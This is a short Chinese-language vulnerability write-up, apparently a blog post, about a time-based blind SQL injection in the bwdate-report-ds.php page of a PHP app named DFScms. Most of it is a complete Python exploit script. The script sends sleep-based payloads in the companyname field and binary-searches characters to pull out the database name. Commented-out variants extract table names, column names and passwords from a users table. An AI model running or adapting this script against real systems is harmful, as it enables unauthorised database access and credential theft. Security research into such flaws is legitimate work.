1.首先可以在源码中看到bwdate-report-ds.php文件中的'$cname'存在注入的可能,再根据后面的if-else语句进行判断得知该变量能拼接恶意代码,可以对其进行盲注。

2022-09-18T15:20:35.png
2022-09-29T08:40:48.png

2.漏洞验证代码如下:

import requests
import time
 
url = "http://localhost/DFScms/dfsms/bwdate-report-ds.php"
flag = ''
 
 
def payload(i, j):
    startTime=time.time()
    # 数据库名字
    sql = "companyname=-1'and if(ascii(substr(database(),%d,1))>%d,sleep(3),-1)and'1=1&submit="%(i,j)
    # 表名
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # 列名
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # 查询flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PHPSESSID=iv4ujtg89cbg68hdmaqb4bbkl7"
    }

    r = requests.post(url=url, headers=headers, data=sql, timeout=15, verify=False)
    # print (r.url)
    if time.time()-startTime>2:
        res = 1
    else:
        res = 0
    return res
 
 
def exp():
    global flag
    for i in range(1, 200):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)
 

exp()

3.运行代码,可以爆破出数据库名

2022-09-18T14:54:32.png